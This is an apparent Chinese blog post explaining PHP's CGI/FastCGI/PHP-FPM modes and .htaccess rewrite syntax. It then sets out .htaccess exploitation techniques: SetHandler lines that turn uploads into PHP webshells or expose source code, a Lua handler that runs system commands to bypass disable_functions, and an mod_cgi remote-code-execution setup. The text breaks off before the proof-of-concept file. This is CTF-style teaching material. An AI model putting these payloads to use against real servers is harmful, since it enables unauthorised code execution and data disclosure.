

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="make changes, make perfect">
  <meta name="author" content="Dr34d">
  <meta name="keywords" content="blog">
  <title>php .htaccess利用 - Dr34d&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/xt256.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"greydr34d.github.io","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":false,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Dr34d's blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Dr34d's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/htaccess_banner.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="php .htaccess利用">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-10-30 11:05" pubdate>
        2020年10月30日 上午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      8.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      108
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">php .htaccess利用</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：19 天前
                
              </p>
            
            <div class="markdown-body">
              <h1 id="php-htaccess利用"><a href="#php-htaccess利用" class="headerlink" title="php .htaccess利用"></a>php .htaccess利用</h1><h2 id="0x01-php-fpm、fastcgi、cgi之间的关系"><a href="#0x01-php-fpm、fastcgi、cgi之间的关系" class="headerlink" title="0x01 php-fpm、fastcgi、cgi之间的关系"></a>0x01 php-fpm、fastcgi、cgi之间的关系</h2><p>转载于：<a target="_blank" rel="noopener" href="https://www.awaimai.com/371.html">https://www.awaimai.com/371.html</a></p>
<p>在整个网站架构中，Web Server（如Apache）只是内容的分发者。举个栗子，如果客户端请求的是 index.html，那么Web Server会去文件系统中找到这个文件，发送给浏览器，这里分发的是静态数据。</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/html.png" alt="img"></p>
<p>如果请求的是 index.php，根据配置文件，Web Server知道这个不是静态文件，需要去找 PHP 解析器来处理，那么他会把这个请求简单处理，然后交给PHP解析器。</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/cgi.png" alt="img"></p>
<p>当Web Server收到 index.php 这个请求后，会启动对应的 CGI 程序，这里就是PHP的解析器。接下来<strong>PHP解析器会解析php.ini文件，初始化执行环境，然后处理请求，再以规定CGI规定的格式返回处理后的结果，退出进程，Web server再把结果返回给浏览器。</strong>这就是一个完整的动态PHP Web访问流程，接下来再引出这些概念，就好理解多了，</p>
<ul>
<li><strong>CGI：</strong>是 Web Server 与 Web Application 之间数据交换的一种协议。</li>
<li><strong>FastCGI：</strong>同 CGI，是一种通信协议，但比 CGI 在效率上做了一些优化。同样，SCGI 协议与 FastCGI 类似。</li>
<li><strong>PHP-CGI：</strong>是 PHP （Web Application）对 Web Server 提供的 CGI 协议的接口程序。</li>
<li><strong>PHP-FPM：</strong>是 PHP（Web Application）对 Web Server 提供的 FastCGI 协议的接口程序，额外还提供了相对智能一些任务管理。</li>
</ul>
<h2 id="0x02-Apache调用解析器的三种方式"><a href="#0x02-Apache调用解析器的三种方式" class="headerlink" title="0x02 Apache调用解析器的三种方式"></a>0x02 Apache调用解析器的三种方式</h2><p>参考：<a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/218495.html">https://www.freebuf.com/vuls/218495.html</a></p>
<p>第一种是最通用最常见的<strong>Module方式</strong>，即在httpd.conf中使用LoadModule的方式，将php的dll或者so文件加载到apache当中。</p>
<p>还有两种是<strong>CGI方式</strong>和<strong>FastCGI方式</strong>。其实后者用的越来越广泛了。一般PHP-FPM也是与FastCGI进行配合使用的。</p>
<h4 id="Module方式"><a href="#Module方式" class="headerlink" title="Module方式"></a>Module方式</h4><p>以 Apache 为例，在PHP Module方式中，是不是在 Apache 的配置文件 httpd.conf 中加上这样几句：</p>
<div class="hljs code-wrapper"><pre><code class="hljs xml"># 加入以下2句
LoadModule php5_module D:/php/php5apache2_2.dll
AddType application/x-httpd-php .php

# 修改如下内容
<span class="hljs-tag">&lt;<span class="hljs-name">IfModule</span> <span class="hljs-attr">dir_module</span>&gt;</span>
    DirectoryIndex index.php index.html
<span class="hljs-tag">&lt;/<span class="hljs-name">IfModule</span>&gt;</span></code></pre></div>

<p>上面是 Windows 下安装php和apache环境后手动配置，在linux下源码安装大致是这样配置的：</p>
<div class="hljs code-wrapper"><pre><code class="hljs gradle"># .<span class="hljs-regexp">/configure --with-mysql=/u</span>sr<span class="hljs-regexp">/local --with-apache=/u</span>sr<span class="hljs-regexp">/local/</span>apache --enable-track-vars</code></pre></div>

<p>所以，这种方式，他们的共同本质都是用 LoadModule 来加载 php5_module，就是<strong>把php作为apache的一个子模块来运行</strong>。当通过web访问php文件时，apache就会调用php5_module来解析php代码。</p>
<p>php5_module是怎么来将数据传给php解析器来解析php代码的呢？答案是通过<strong>sapi</strong>。</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/1417244404_9526.png" alt="mode_php"></p>
<p>所以，以上的apache调用php执行的过程如下：</p>
<div class="hljs code-wrapper"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">apache</span> -&gt;</span> <span class="hljs-function"><span class="hljs-title">httpd</span> -&gt;</span> <span class="hljs-function"><span class="hljs-title">php5_module</span> -&gt;</span> <span class="hljs-function"><span class="hljs-title">sapi</span> -&gt;</span> php</code></pre></div>



<h4 id="CGI方式"><a href="#CGI方式" class="headerlink" title="CGI方式"></a>CGI方式</h4><p>CGI（<strong>Common Gateway Interface</strong>）全称是“<strong>通用网关接口</strong>”，WEB 服务器与PHP应用进行“交谈”的一种工具，其程序须运行在网络服务器上。CGI可以用任何一种语言编写，只要这种语言具有标准输入、输出和环境变量。如php、perl、tcl等。</p>
<p>WEB服务器会传哪些数据给PHP解析器呢？<strong>URL、查询字符串、POST数据、HTTP header</strong>都会有。所以，CGI就是规定要传哪些数据，以什么样的格式传递给后方处理这个请求的协议。仔细想想，你在PHP代码中使用的用户从哪里来的。</p>
<p>也就是说，CGI就是专门用来和 web 服务器打交道的。web服务器收到用户请求，就会把请求提交给cgi程序（如php-cgi），cgi程序根据请求提交的参数作应处理（解析php），然后输出标准的html语句，返回给web服服务器，WEB服务器再返回给客户端，这就是普通cgi的工作原理。</p>
<p>CGI的好处就是完全独立于任何服务器，仅仅是做为中间分子。提供接口给apache和php。他们通过cgi搭线来完成数据传递。这样做的好处了尽量减少2个的关联，使他们2变得更独立。</p>
<p>但是CGI有个蛋疼的地方，就是每一次web请求都会有启动和退出过程，也就是最为人诟病的<strong>fork-and-execute</strong>模式，这样一在大规模并发下，就死翘翘了。</p>
<h4 id="FastCGI方式"><a href="#FastCGI方式" class="headerlink" title="FastCGI方式"></a>FastCGI方式</h4><p>从根本上来说，FastCGI是用来提高CGI程序性能的。类似于CGI，<strong>FastCGI也可以说是一种协议</strong>。</p>
<p>FastCGI像是一个<strong>常驻(long-live)型的CGI</strong>，它可以一直执行着，只要激活后，不会每次都要花费时间去fork一次。它还支持分布式的运算, 即 FastCGI 程序可以在网站服务器以外的主机上执行，并且接受来自其它网站服务器来的请求。</p>
<p>FastCGI是语言无关的、可伸缩架构的CGI开放扩展，其主要行为是将CGI解释器进程保持在内存中，并因此获得较高的性能。众所周知，CGI解释器的反复加载是CGI性能低下的主要原因，如果CGI解释器保持在内存中，并接受FastCGI进程管理器调度，则可以提供良好的性能、伸缩性、Fail- Over特性等等。</p>
<h5 id="FastCGI的工作原理"><a href="#FastCGI的工作原理" class="headerlink" title="FastCGI的工作原理"></a>FastCGI的工作原理</h5><p>FastCGI接口方式采用C/S结构，可以将HTTP服务器和脚本解析服务器分开，同时在脚本解析服务器上启动一个或者<strong>多个脚本解析守护进程</strong>。当HTTP服务器每次遇到动态程序时，可以将其直接交付给FastCGI进程来执行，然后将得到的结果返回给浏览器。这种方式可以让HTTP服务器专一地处理静态请求，或者将动态脚本服务器的结果返回给客户端，这在很大程度上提高了整个应用系统的性能。</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/fastcgi.png" alt="fastcgi"></p>
<ol>
<li>Web Server启动时载入FastCGI进程管理器（Apache Module或IIS ISAPI等)</li>
<li>FastCGI进程管理器自身初始化，启动多个CGI解释器进程(可建多个php-cgi)，并等待来自Web Server的连接。</li>
<li>当客户端请求到达Web Server时，FastCGI进程管理器选择并连接到一个CGI解释器。Web server将CGI环境变量和标准输入发送到FastCGI子进程php-cgi。</li>
<li>FastCGI子进程完成处理后，将标准输出和错误信息从同一连接返回Web  Server。当FastCGI子进程关闭连接时，请求便告处理完成。<strong>FastCGI子进程接着等待，并处理来自FastCGI进程管理器(运行在Web Server中)的下一个连接。 在CGI模式中，php-cgi在此便退出了。</strong></li>
</ol>
<p>FastCGI与CGI特点：</p>
<ol>
<li><p><strong>对于CGI来说，每一个Web请求PHP都必须重新解析php.ini、重新载入全部扩展，并重新初始化全部数据结构。而使用FastCGI，所有这些都只在进程启动时发生一次。</strong>一个额外的好处是，持续数据库连接(Persistent database connection)可以工作。</p>
</li>
<li><p>由于FastCGI是多进程，所以比CGI多线程消耗更多的服务器内存，php-cgi解释器每进程消耗7至25兆内存，将这个数字乘以50或100就是很大的内存数。</p>
</li>
</ol>
<h4 id="PHP-FPM"><a href="#PHP-FPM" class="headerlink" title="PHP-FPM"></a>PHP-FPM</h4><p>要了解PHP-FPM，就得先说说PHP-CGI。</p>
<p><strong>PHP-CGI就是PHP实现的自带的FastCGI管理器</strong>。 虽然是php官方出品，但是这丫的却一点也不给力，性能太差，而且也很麻烦不人性化，主要体现在：</p>
<ol>
<li>php-cgi变更php.ini配置后，需重启php-cgi才能让新的php-ini生效，不可以平滑重启。</li>
<li>直接杀死php-cgi进程，php就不能运行了。</li>
</ol>
<p>上面2个问题，一直让很多人病垢了很久，所以很多人一直还是在用 Module 方式。 直到 2004年一个叫 Andrei Nigmatulin的屌丝发明了PHP-FPM ，这神器的出现就彻底打破了这种局面，这是一个PHP专用的 fastcgi 管理器，它很爽的克服了上面2个问题，而且，还表现在其他方面更表现强劲。</p>
<p>也就是说，PHP-FPM 是对于 FastCGI 协议的具体实现，他负责管理一个进程池，来处理来自Web服务器的请求。<strong>目前，PHP5.3版本之后，PHP-FPM是内置于PHP的</strong>。</p>
<p>因为PHP-CGI只是个CGI程序，他自己本身只能解析请求，返回结果，不会进程管理。所以就出现了一些能够调度 php-cgi 进程的程序，比如说由lighthttpd分离出来的spawn-fcgi。同样，PHP-FPM也是用于调度管理PHP解析器php-cgi的管理程序。</p>
<p>PHP-FPM通过生成新的子进程可以实现php.ini修改后的平滑重启。</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/update.png" alt="img"></p>
<p>所以，如果要搭建一个高性能的PHP WEB服务器，目前最佳的方式是<strong>Apache/Nginx</strong> + <strong>FastCGI</strong> + **PHP-FPM(+PHP-CGI)**方式了，不要再使用 Module加载或者 CGI 方式啦：）</p>
<h2 id="0x03-htaccess基本使用"><a href="#0x03-htaccess基本使用" class="headerlink" title="0x03 .htaccess基本使用"></a>0x03 .htaccess基本使用</h2><p>更加完整的文档：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://perishablepress.com/stupid-htaccess-tricks/"><a target="_blank" rel="noopener" href="https://perishablepress.com/stupid-htaccess-tricks/">Stupid .htaccess Tricks</a></a></li>
</ul>
<h3 id="htaccess文件使用前提"><a href="#htaccess文件使用前提" class="headerlink" title=".htaccess文件使用前提"></a>.htaccess文件使用前提</h3><p>.htaccess的主要作用就是实现url改写，也就是当浏览器通过url访问到服务器某个文件夹时，作为主人，我们可以来接待这个url，具体地怎样接待它，就是此文件的作用。所有的访问都是通过URL实现，所以.htaccess的作用非同小可。正因为此，所以一般地网站通过设置.htaccess，通过一个十分友好的url吸引用户进来，然后用.htaccess把用户带到需要访问的位置。</p>
<p>要想使用这个强大功能，就得开启apache里面的重写模块。</p>
<p>前面的文章中曾经讲到过<a target="_blank" rel="noopener" href="http://www.nbphp.com/blog/windows-ubuntu-open-rewrite-mod-htaccess/">windows和ubuntu开启 rewrite模块使用.htaccess</a> 。</p>
<p>其实开启模块大体的步骤都是一样的，无论是Windows和linux。</p>
<h3 id="htaccess基本语法介绍"><a href="#htaccess基本语法介绍" class="headerlink" title=".htaccess基本语法介绍"></a>.htaccess基本语法介绍</h3><p>开启重写引擎 ：RewriteEngine on</p>
<p>设置重写的根目录：RewriteBase /   — 说明 ：因为定义了这个文件夹，所以对应的替换就有了一个参照。</p>
<p>匹配所有符合条件的请求：RewriteCond    — 说明：RewriteCond  定义了一系列规则条件，这个指令可以有一条或者多条，只有用户拿来的url符合这些条件之后，我们的.htaccess才开始接待，否则用户就直接自己去访问所需要的目录了。</p>
<p>举个例子，为了能让搜索引擎更多地抓取我们的网页而避免重复抓，我们通常把没有www的域名重定向到<a href="http://www.XXX.com，如下就实现了这个功能：">www.XXX.com，如下就实现了这个功能：</a></p>
<p>RewriteEngine On</p>
<div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-attribute"><span class="hljs-nomarkup">RewriteCond</span></span> <span class="hljs-variable">%&#123;HTTP_HOST&#125;</span>  ^nbphp\.com$<span class="hljs-meta"> [NC]</span>

<span class="hljs-attribute"><span class="hljs-nomarkup">RewriteRule</span></span> ^(.*)$  http://www.nbphp.com/$<span class="hljs-number">1</span><span class="hljs-meta"> [R=301,L]</span></code></pre></div>

<p>上例便把nbphp.com 重定向到<a target="_blank" rel="noopener" href="http://www.nbphp.com/">www.nbphp.com</a></p>
<p>%{HTTP_HOST} 是指取得用户访问的URL的主域名  然后空格后面是一个正则表达式匹配，意识就是说是否是 nbphp.com 。</p>
<p><strong>如果用户访问使用的URL满足所有列出的RewriteCond 提出的条件，那么进行下一步RewriteRule 即开始进行引导</strong>，这才开始实现.htaccess文件的重要功能。</p>
<p>同样，前面是正则表达式，<strong>用户分析用户的除了主域名nbphp.com之外的URL</strong> ,^(.*)$的意思就是所有的内容。 然后空格后面写的是我们引导用户访问的目录，我们带着他走到新的一个域名上。$1 指的是前面括号里匹配url所得到的内容。</p>
<p>这样就是一个完整的小例子。关于RewriteCond里 如何调用url的某个部分，我们可以参考这篇文章（<a target="_blank" rel="noopener" href="http://blog.csdn.net/keyunq/archive/2008/06/11/2536875.aspx">Apache的Mod_rewrite学习 (RewriteCond重写规则的条件</a>)；</p>
<p>我们来分析一下 <a target="_blank" rel="noopener" href="http://www.phplamp.org/2009/01/discuz7-htaccess-download/">discuz7.0 搜索引擎优化 htaccess </a>里面的重写。</p>
<div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-attribute"><span class="hljs-nomarkup">RewriteRule</span></span> ^forum-([<span class="hljs-number">0</span>-<span class="hljs-number">9</span>]+)-([<span class="hljs-number">0</span>-<span class="hljs-number">9</span>]+)\.html$  forumdisplay.php?fid=$<span class="hljs-number">1</span>&amp;page=$<span class="hljs-number">2</span></code></pre></div>

<p>首先加入用户通过 nbphp.com/forum-2-3.html  访问discuz论坛，那么先通过.htaccess过滤，看看是否需要.htaccess引导一下用户，如果满足列出的一系列RewriteCond的条件那么就进行重写，<strong>discuz的没有列出RewriteCond 所以应该全部都进行重写</strong>。所以开始进行转写，forum-2-3.html 这个正好符合  列出的^forum-([0-9]+)-([0-9]+).html$ 正则表达式。并且 $1 为 2  ，$2为3 ，所以代入后面，即  forumdisplay.php?fid=2&amp;page=3 加上前面的RewriteBase  指定的文件目录，那么就带他到制定目录的forumdisplay.php?fid=2&amp;page=3 。</p>
<h3 id="常见的-htaccess应用举例"><a href="#常见的-htaccess应用举例" class="headerlink" title="常见的.htaccess应用举例"></a>常见的.htaccess应用举例</h3><p><strong>防止盗链，如果来得要访问jpe jpg bmp png结尾的url 用户不是来自我们的网站，那么让他看一张我们网站的展示图片。</strong></p>
<p>RewriteEngine On</p>
<p>RewriteCond %{HTTP_REFERER} !^http://(.+.)?mysite.com/ [NC]</p>
<p>RewriteCond %{HTTP_REFERER} !^$</p>
<p>RewriteRule .*.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]</p>
<p><strong>网站升级的时候，只有特定IP才能访问，其他的用户将看到一个升级页面</strong></p>
<p>RewriteEngine on</p>
<p>RewriteCond %{REQUEST_URI} !/upgrade.html$</p>
<p>RewriteCond %{REMOTE_HOST} !^24.121.202.30</p>
<p>RewriteRule $ <a target="_blank" rel="noopener" href="http://www.nbphp.com/upgrade.html">http://www.nbphp.com/upgrade.html</a> [R=302,L]</p>
<p><strong>把老的域名转向新域名</strong></p>
<p># redirect from old domain to new domain</p>
<p>RewriteEngine On</p>
<p>RewriteRule ^(.*)$<a target="_blank" rel="noopener" href="http://www.yourdomain.com/$1[R=301,L]">http://www.yourdomain.com/$1[R=301,L]</a></p>
<h3 id="一些其他功能"><a href="#一些其他功能" class="headerlink" title="一些其他功能"></a>一些其他功能</h3><p><strong>引出错误文档的目录</strong></p>
<p>ErrorDocument 400 /errors/badrequest.html</p>
<p>ErrorDocument 404  <a target="_blank" rel="noopener" href="http://yoursite/errors/notfound.html">http://yoursite/errors/notfound.html</a></p>
<p>ErrorDocument 401 “Authorization Required</p>
<p><strong>Blocking users by IP 根据IP阻止用户访问</strong></p>
<p>order allow,deny</p>
<p>deny from 123.45.6.7</p>
<p>deny from 12.34.5. (整个C类地址)</p>
<p>allow from all</p>
<p><strong>防止目录浏览</strong></p>
<p># disable directory browsing</p>
<p>Options All -Indexes</p>
<p><strong>设置默认首页</strong></p>
<p># serve alternate default index page</p>
<p>DirectoryIndex about.html</p>
<p><strong>把一些老的链接转到新的链接上——搜索引擎优化SEO</strong></p>
<p>Redirect 301 /d/file.html<a target="_blank" rel="noopener" href="http://www.htaccesselite.com/r/file.html">http://www.htaccesselite.com/r/file.html</a></p>
<p><strong>为服务器管理员设置电子邮件。</strong></p>
<p>ServerSignature EMail</p>
<p>SetEnv <a href="mailto:&#x53;&#x45;&#82;&#86;&#x45;&#x52;&#95;&#x41;&#x44;&#x4d;&#73;&#x4e;&#x64;&#x65;&#102;&#x61;&#117;&#108;&#116;&#64;&#x64;&#111;&#109;&#x61;&#105;&#110;&#x2e;&#99;&#x6f;&#x6d;">&#x53;&#x45;&#82;&#86;&#x45;&#x52;&#95;&#x41;&#x44;&#x4d;&#73;&#x4e;&#x64;&#x65;&#102;&#x61;&#117;&#108;&#116;&#64;&#x64;&#111;&#109;&#x61;&#105;&#110;&#x2e;&#99;&#x6f;&#x6d;</a></p>
<h2 id="0x04-htaccess生效方法"><a href="#0x04-htaccess生效方法" class="headerlink" title="0x04 .htaccess生效方法"></a>0x04 .htaccess生效方法</h2><p><code>vim /etc/apache2/apache2.conf</code></p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200910163808808.png" alt="image-20200910163808808"></p>
<h2 id="0x05-htaccess利用方式"><a href="#0x05-htaccess利用方式" class="headerlink" title="0x05 .htaccess利用方式"></a>0x05 .htaccess利用方式</h2><h3 id="SetHandler-解析利用"><a href="#SetHandler-解析利用" class="headerlink" title="SetHandler 解析利用"></a>SetHandler 解析利用</h3><h4 id="1-解析成php——getshell"><a href="#1-解析成php——getshell" class="headerlink" title="1. 解析成php——getshell"></a>1. 解析成php——getshell</h4><div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-attribute"><span class="hljs-nomarkup">SetHandler</span></span> application/x-httpd-php</code></pre></div>

<p>此时当前目录及其子目录下所有文件都会被当做php解析</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t01688d340f73299689.png" alt="img"></p>
<h4 id="2-解析成文本——查看源码"><a href="#2-解析成文本——查看源码" class="headerlink" title="2. 解析成文本——查看源码"></a>2. 解析成文本——查看源码</h4><div class="hljs code-wrapper"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">FilesMatch</span> &quot;\<span class="hljs-attr">.php</span>$&quot; &gt;</span>
    SetHandler text/plain
<span class="hljs-tag">&lt;/<span class="hljs-name">FilesMatch</span>&gt;</span></code></pre></div>

<p>可以将当前目录下文件都当做文本解析，这样便可获得文件源码</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t01384d631cb807c63d.png" alt="img"></p>
<p>或者用下面的方法：</p>
<div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-attribute">php_flag</span> engine <span class="hljs-number">0</span></code></pre></div>



<h4 id="3-server-status——监控访问"><a href="#3-server-status——监控访问" class="headerlink" title="3. server-status——监控访问"></a>3. server-status——监控访问</h4><p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t01fbe1b91fd006c1d6.png" alt="img"></p>
<p>可添加参数<code>?refresh=5</code>来实现每隔5s自动刷新</p>
<p>可以监控所有的访问。但是信息不够多，还可以想想有没有附加的配置项。</p>
<h4 id="4-解析成lua脚本——绕过disable-functions"><a href="#4-解析成lua脚本——绕过disable-functions" class="headerlink" title="4. 解析成lua脚本——绕过disable_functions"></a>4. 解析成lua脚本——绕过disable_functions</h4><p>实际上是执行lua脚本。需要有apache-lua 模块，lua脚本能干的事情都能干，不运行php自然就不需要考虑disable_function的影响。</p>
<p>handler</p>
<div class="hljs code-wrapper"><pre><code class="hljs lua"><span class="hljs-built_in">require</span> <span class="hljs-string">&quot;string&quot;</span>

<span class="hljs-comment">--[[</span>
<span class="hljs-comment">     This is the default method name for Lua handlers, see the optional</span>
<span class="hljs-comment">     function-name in the LuaMapHandler directive to choose a different</span>
<span class="hljs-comment">     entry point.</span>
<span class="hljs-comment">--]]</span>

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">handle</span><span class="hljs-params">(r)</span></span>
    r.content_type = <span class="hljs-string">&quot;text/plain&quot;</span>
    r:puts(<span class="hljs-string">&quot;Hello Lua World!\n&quot;</span>)
    <span class="hljs-keyword">local</span> t = <span class="hljs-built_in">io</span>.<span class="hljs-built_in">popen</span>(<span class="hljs-string">&#x27;/readflag&#x27;</span>)
    <span class="hljs-keyword">local</span> a = t:<span class="hljs-built_in">read</span>(<span class="hljs-string">&quot;*all&quot;</span>)
    r:puts(a)
    <span class="hljs-keyword">if</span> r.method == <span class="hljs-string">&#x27;GET&#x27;</span> <span class="hljs-keyword">then</span>
        <span class="hljs-keyword">for</span> k, v <span class="hljs-keyword">in</span> <span class="hljs-built_in">pairs</span>( r:parseargs() ) <span class="hljs-keyword">do</span>
            r:puts( <span class="hljs-built_in">string</span>.<span class="hljs-built_in">format</span>(<span class="hljs-string">&quot;%s: %s\n&quot;</span>, k, v) )
        <span class="hljs-keyword">end</span>
    <span class="hljs-keyword">else</span>
        r:puts(<span class="hljs-string">&quot;Unsupported HTTP method &quot;</span> .. r.method)
    <span class="hljs-keyword">end</span>
<span class="hljs-keyword">end</span></code></pre></div>









<h3 id="CGI启动方式RCE利用"><a href="#CGI启动方式RCE利用" class="headerlink" title="CGI启动方式RCE利用"></a>CGI启动方式RCE利用</h3><p>当我们了解原理后，Apache是需要调用第三方CGI程序，但是一个程序是不是CGI程序这个事很难界定，我们能否通过调用特定的CGI程序(普通程序)来执行任意系统命令呢。答案是可以的。</p>
<h4 id="mod-cgi-模块"><a href="#mod-cgi-模块" class="headerlink" title="mod_cgi 模块"></a>mod_cgi 模块</h4><p>具有处理程序<code>cgi-script</code>的任何文件都将被视为  CGI 脚本，并由服务器运行，并将其输出返回给 Client 端。文件通过具有包含由<a target="_blank" rel="noopener" href="https://www.docs4dev.com/docs/zh/apache/2.4/reference/mod-mod_mime.html#addhandler">AddHandler</a>指令定义的 extensions 的名称或位于<a target="_blank" rel="noopener" href="https://www.docs4dev.com/docs/zh/apache/2.4/reference/mod-mod_alias.html#scriptalias">ScriptAlias</a>目录中来获取此处理程序。</p>
<h4 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h4><blockquote>
<p>​    1.保证htaccess会被解析，即当前目录中配置了`AllowOverride all或AllowOverride Options FileInfo。AllowOverride参数具体作用可参考Apache之AllowOverride参数详解。(Require all granted也是需要的)</p>
<p>​    2.cgi_module被加载。即apache配置文件中有LoadModule cgi_module modules/mod_cgi.so这么一句且没有被注释。</p>
<p>​    3.有目录的上传、写入权限。</p>
</blockquote>
<h4 id="利用姿势"><a href="#利用姿势" class="headerlink" title="利用姿势"></a>利用姿势</h4><p>上传.htaccess  文件, 内容如下：</p>
<div class="hljs code-wrapper"><pre><code class="hljs mipsasm">Options ExecCGI
<span class="hljs-keyword">AddHandler </span>cgi-<span class="hljs-keyword">script </span>.xx</code></pre></div>

<p>Options ExecCGI表示允许CGI执行，如果AllowOverride只有FileInfo权限且本身就开启了ExecCGI的话，就可以不需要这句话了。</p>
<p>Options +ExecCGI 作用相同。</p>
<p>第二句告诉Apache<strong>将xx后缀名的文件，当做CGI程序进行解析</strong>。</p>
<p>windows，上传poc.xx文件，内容如下：</p>
